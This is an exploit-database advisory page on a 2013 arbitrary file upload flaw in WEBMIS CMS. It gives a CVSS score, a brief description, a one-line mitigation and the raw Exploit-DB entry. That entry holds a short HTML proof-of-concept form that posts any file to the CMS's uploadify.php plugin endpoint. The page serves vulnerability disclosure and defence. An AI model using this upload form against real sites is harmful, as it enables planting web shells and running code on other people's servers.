header-logo
Suggest Exploit
vendor:
CMS
by:
SecurityFocus
7,5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

WEBMIS CMS Arbitrary File Upload Vulnerability

WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Mitigation:

Input validation should be used to ensure that only expected files are uploaded.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/68658/info

WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

<form 
action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php" 
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type=text name="path" value="/webmis_installation/plugin/">
<input type=text name="someKey" value="someValue"]>
<input type="submit" name="submit" value="Submit">
</form>